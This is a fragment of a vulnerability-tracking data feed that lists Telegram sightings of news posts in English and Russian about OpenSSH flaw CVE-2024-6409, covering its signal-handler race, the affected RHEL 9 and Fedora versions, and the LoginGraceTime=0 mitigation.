"vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5333", "content": "\u200aCVE-2024-6409: New Remote Code Execution Vulnerability in OpenSSH\n\nhttps://securityonline.info/cve-2024-6409-new-remote-code-execution-vulnerability-in-openssh/", "creation_timestamp": "2024-07-09T10:08:52.000000Z"}, {"uuid": "58296456-677a-4bb4-8a3b-facb95a92e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5786", "content": "\u200aA new flaw in OpenSSH can lead to remote code execution\n\nhttps://securityaffairs.com/165535/hacking/openssh-flaw-cve-2024-6409.html", "creation_timestamp": "2024-07-12T13:27:59.000000Z"}, {"uuid": "02d8c365-4287-444c-9a50-4bd8d5cb6468", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/6336", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T18:30:29.000000Z"}, {"uuid": "f082a6a5-9a59-4176-b165-94c8bd0aaee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/6333", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T18:30:28.000000Z"}, {"uuid": "94df3d50-c34d-45eb-9cba-8105003b91eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "Telegram/74FvZzrxPZzOFcD3Z7htHxpXJWynycXIyH1ql7Vd7keQiMdK", "content": "", "creation_timestamp": "2024-07-10T06:13:07.000000Z"}, {"uuid": "78b20204-e067-4122-a65a-01510851ff19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/14703", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "0f502186-f00a-4271-ab78-83673f5095dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "Telegram/ADmedM95kByDcCNpMf4Yprqz7t01FKYHlAAE1LdcmjJQFA", "content": "", "creation_timestamp": "2024-07-10T06:23:20.000000Z"}, {"uuid": "84cbf7fd-ed01-44cb-bbbd-c5bd26b27f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/2863", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "9e646d70-957d-4f5a-aa92-05cfc6f2241b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/KomunitiSiber/2227", "content": "New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\nhttps://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T06:30:56.000000Z"}, {"uuid": "2e340330-328a-4710-a5f0-c2d2dc119bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/cyberden_team/513", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2024-07-11T19:54:07.000000Z"}, {"uuid": "bdcfe9b7-9ebf-43c3-9220-1913a52b786e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/true_secator/5950", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T17:35:05.000000Z"}, {"uuid": "c0e8b7df-5713-4aec-8b9f-9b0bb7749397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ctinow/220340", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T10:49:15.000000Z"}, {"uuid": "3dc4b2e2-6250-4cf7-8f4c-87f95fead83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ctinow/220337", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T09:54:52.000000Z"}, {"uuid": "2d8f6c58-59b4-4198-943c-950ea1863c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/information_security_channel/52545", "content": "Microsoft Says Windows Not Impacted by regreSSHion as Second OpenSSH Bug Is Found\nhttps://www.securityweek.com/microsoft-says-windows-not-impacted-by-regresshion-as-second-openssh-bug-is-found/\n\nA second remote code execution vulnerability, tracked as CVE-2024-6409, was found in OpenSSH during an analysis of the regreSSHion flaw.\nThe post Microsoft Says Windows Not Impacted by regreSSHion as Second OpenSSH Bug Is Found (https://www.securityweek.com/microsoft-says-windows-not-impacted-by-regresshion-as-second-openssh-bug-is-found/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-07-15T14:08:56.000000Z"}, {"uuid": "594f1b9c-1d4f-464a-97f3-07da14800da3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "https://t.me/thehackernews/5229", "content": "\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 &amp; 8.8p1, allowing RCE via race condition in privsep child process. \n \nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n \n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.", "creation_timestamp": "2024-07-10T05:48:02.000000Z"}, {"uuid": "c8772446-7105-405d-95d8-074a8d3e3b4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/xakep_ru/16110", "content": "\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2024/07/16/cve-2024-6409/", "creation_timestamp": "2024-07-16T21:22:30.000000Z"}, {"uuid": "981082d3-79e7-4f8e-b8ce-8297743b5ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/anti_malware/17904", "content": "\u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043c\u043d\u043e\u0433\u043e \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 OpenSSH, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 Microsoft \u0440\u0435\u0448\u0438\u043b\u0430 \u0443\u0442\u043e\u0447\u043d\u0438\u0442\u044c, \u0447\u0442\u043e Windows \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u0430 \u00abregreSSHion\u00bb \u0438 CVE-2024-6409.", "creation_timestamp": "2024-08-27T16:05:57.000000Z"}, {"uuid": "a4423559-dce3-417f-b922-e17dea4db4a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/S_E_Reborn/4929", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c 